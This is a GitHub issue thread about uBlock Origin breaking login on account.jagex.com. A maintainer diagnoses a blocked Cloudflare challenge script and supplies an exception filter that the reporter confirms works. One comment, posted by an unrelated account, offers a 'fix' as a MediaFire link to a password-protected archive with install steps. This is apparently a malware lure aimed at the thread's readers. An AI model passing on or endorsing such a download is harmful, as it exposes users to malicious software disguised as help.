### ISSUE TITLE
account.jagex.com: breakage

### ISSUE THREAD

**Issue by qwerty01** [uBlockOrigin/uAssets#25133]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://account.jagex.com/en-GB/assisted-login`

### Category

breakage

### Description

When attempting to login, the site says that the login is blocked: 
![image](https://github.com/user-attachments/assets/aa50bc24-04c5-4f2b-8282-444033b6c627)
There are several other people that have also run into this issue: https://www.reddit.com/r/2007scape/comments/15zafxz/comment/liezxwe/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button

After disabling ublock, the login is no longer blocked.

### Other extensions used

- SponsorBlock
- DarkReader
- 1Password
- Kagi

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![image](https://github.com/user-attachments/assets/bc7ac9a3-9f28-4d46-9898-ee75c6543df7)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 127
filterset (summary):
 network: 157185
 cosmetic: 48016
 scriptlet: 20728
 html: 1949
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 39963-126, 9m Δ
  ublock-badware: 10884-6, 9m Δ
  ublock-privacy: 1113-4, 9m Δ
  ublock-unbreak: 2530-1, 9m Δ
  ublock-quick-fixes: 227-72, 9m Δ
  easylist: 85794-180, 9m Δ
  easyprivacy: 53077-64, 9m Δ
  urlhaus-1: 32345-0, now
  plowe-0: 3547-994, now
filterset (user): [empty]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 108 ms (selfie)
 maxAssetCacheWait: 43 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 3
 network:
  jagex.com: 2
  googletagmanager.com: 1
```
</details>

**Comment by stephenhawk8054** [comment]
Test again in a new Firefox profile with only uBO and its default settings.

**Comment by qwerty01** [comment]
Ran it in a new firefox profile with only uBO in default settings and the same issue occurred.

**Comment by stephenhawk8054** [comment]
Can you test this filter:

```adb
@@||account.jagex.com/cdn-cgi/challenge-platform/scripts/jsd/main.js$script,1p
```

Click on uBO icon > ⚙ [Dashboard button](https://github.com/gorhill/uBlock/wiki/Quick-guide:-popup-user-interface#the-tools) > Add the filter(s) in ["My filters" pane](https://github.com/gorhill/uBlock/wiki/Dashboard:-My-filters) > ✓ Apply changes > Restart the browser and test again.

**Comment by qwerty01** [comment]
That worked! The login is no longer blocked with that filter.

**Comment by stephenhawk8054** [comment]
cc @uBlock-user @Yuki2718 1st breakage case

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by stephenhawk8054** [comment]
Better to test when registering a new account. May need to clear cache / cookies before testing each case.

When I register a new account, blocking that script will result in an error page. When unblocking, it will show a page of having sendt email for confirmation.

**Comment by stephenhawk8054** [comment]
If the request is not fired, it might be cached somewhere (could be network or server). I've never successfully registered to the site when the request is fired and blocked from beginning (I tested in a profile that clear cookies/history when closing).
